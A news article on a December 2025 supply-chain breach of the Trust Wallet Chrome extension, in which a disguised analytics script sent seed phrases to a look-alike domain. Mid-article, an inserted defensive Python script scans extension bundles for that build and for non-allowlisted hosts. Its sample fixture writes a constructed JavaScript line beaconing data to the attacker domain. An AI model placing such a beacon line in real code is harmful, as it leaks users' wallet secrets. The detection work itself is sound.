TrustWallet Chrome Extension Hacked – Users Reporting Millions in Losses

Many Trust Wallet users saw their wallets drained of over $7 million after a security breach in the Chrome browser extension version 2.68.0, released on December 24, 2025.

Blockchain investigator ZachXBT first flagged the incident on X, noting a surge in unauthorized outflows from affected addresses shortly after users interacted with the extension.

Reports emerged on Christmas Eve, with victims sharing screenshots of emptied portfolios, including significant holdings in ETH, BTC, SOL, and BNB.

One user claimed a $300,000 loss in minutes after simple authorization, with transactions funneled to multiple attacker-controlled addresses. PeckShield estimated initial losses at $6 million; Trust Wallet later confirmed approximately $7 million across hundreds of wallets.

The attack coincided with the Chrome Web Store extension update, affecting desktop users but sparing the mobile app. Security firm SlowMist issued an alert, describing a potential supply-chain compromise in which malicious code was injected upstream.

Malicious Code Exposed

Researchers examined a compromised bundle and found a JavaScript file named 4482.js that was masquerading as PostHog analytics. The obfuscated script activated on seed phrase import, silently exfiltrating sensitive wallet data, including recovery phrases, to api.metrics-trustwallet.com, a domain registered days earlier and mimicking official branding.

Public WHOIS records confirmed its novelty, with no ties to legitimate Trust Wallet infrastructure.

Attacker sophistication extended to parallel phishing: domains like fix-trustwallet.com lured panicked users with fake “vulnerability fixes,” prompting seed phrase entry for instant drains. The shared registrar across phishing sites suggests coordinated operations.

Trust Wallet acknowledged the breach on December 25 via X, isolated it to version 2.68.0, and urged users to disable that version immediately. Users must navigate to chrome://extensions/?id=egjidjbpglichdcondbcbdnbeeppgdph, toggle the extension off, enable developer mode, and update to v2.69, the only version confirmed safe.
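As an added example (not code from the article, from Trust Wallet, or from any of the researchers named above), the following Python script shows how a defender could triage an unpacked extension bundle against the two indicators the article gives: the manifest version the vendor identified as compromised, and outbound hostnames in the bundled JavaScript that are not on a vendor allowlist. The allowlist, the bundle layout, and the sample files the script writes are constructed assumptions; the look-alike host and the flagged version number are the ones reported above.

```python
"""Triage an unpacked browser-extension bundle for the indicators in the article.

Added example; the allowlist and the sample bundle are constructed assumptions.
"""
import json
import os
import re
import tempfile

# Version the vendor isolated as compromised (from the article).
KNOWN_BAD_VERSIONS = {"2.68.0"}

# Hypothetical allowlist of hosts the extension is expected to contact.
# A real allowlist would come from the vendor's documented endpoints.
ALLOWED_HOSTS = {"trustwallet.com", "api.trustwallet.com"}

# Captures the hostname of any http(s) URL literal in a script.
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def is_allowed(host, allowed=ALLOWED_HOSTS):
    """True only for an exact allowlisted host or a subdomain of one.

    Deliberately avoids a substring test: "api.metrics-trustwallet.com"
    contains "trustwallet.com" but is a different registrable domain.
    """
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in allowed)


def extract_hosts(js_source):
    """Return the sorted set of hostnames referenced by URL literals."""
    return sorted({m.group(1).lower() for m in HOST_RE.finditer(js_source)})


def triage_bundle(bundle_dir, allowed=ALLOWED_HOSTS, bad_versions=KNOWN_BAD_VERSIONS):
    """Return (manifest_version, findings) for an unpacked extension directory."""
    findings = []
    with open(os.path.join(bundle_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    version = manifest.get("version", "")
    if version in bad_versions:
        findings.append(f"manifest.json: version {version} is a known-compromised build")

    for root, _dirs, files in os.walk(bundle_dir):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            for host in extract_hosts(src):
                if not is_allowed(host, allowed):
                    rel = os.path.relpath(path, bundle_dir)
                    findings.append(f"{rel}: contacts non-allowlisted host {host}")
    return version, findings


def build_sample_bundle(root):
    """Write a constructed two-file bundle mirroring the article's description."""
    os.makedirs(root, exist_ok=True)
    with open(os.path.join(root, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "Sample Wallet", "version": "2.68.0", "manifest_version": 3}, fh)
    # Benign chunk that only talks to the vendor API (constructed).
    with open(os.path.join(root, "main.js"), "w", encoding="utf-8") as fh:
        fh.write('fetch("https://api.trustwallet.com/v1/prices");\n')
    # Chunk standing in for the article's 4482.js: an "analytics" shim that
    # beacons to the look-alike domain (constructed stand-in, no real payload).
    with open(os.path.join(root, "4482.js"), "w", encoding="utf-8") as fh:
        fh.write('// analytics shim\n'
                 'navigator.sendBeacon("https://api.metrics-trustwallet.com/collect", data);\n')


def demo():
    """Build the sample bundle in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_bundle(tmp)
        return triage_bundle(tmp)


if __name__ == "__main__":
    version, findings = demo()
    print(f"manifest version: {version}")
    for line in findings:
        print("FINDING:", line)
```

Run against a real extension, point `triage_bundle` at the unpacked directory Chrome keeps under its profile (or at a bundle you downloaded and extracted yourself). The important design choice is `is_allowed`: matching on exact host or a dot-delimited parent domain is what lets the script separate `api.trustwallet.com` from the look-alike `api.metrics-trustwallet.com`; a naive "does the string contain trustwallet.com" check would pass both.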

The team pledged full refunds to affected users, prioritized support outreach, and warned against unofficial DMs. Binance co-founder Changpeng Zhao hinted at possible insider involvement, amplifying scrutiny on the Binance-acquired wallet.

This breach underscores supply-chain perils in crypto extensions, where auto-updates bypass user scrutiny. Affected chains span EVM, Bitcoin, and Solana, with stolen funds laundered via mixers.

Cybersecurity experts recommend using new wallets for potentially exposed seeds and verifying updates vigilantly. As investigations continue, Trust Wallet’s refund process will test user trust amid 2025’s $3 billion in hacking losses.
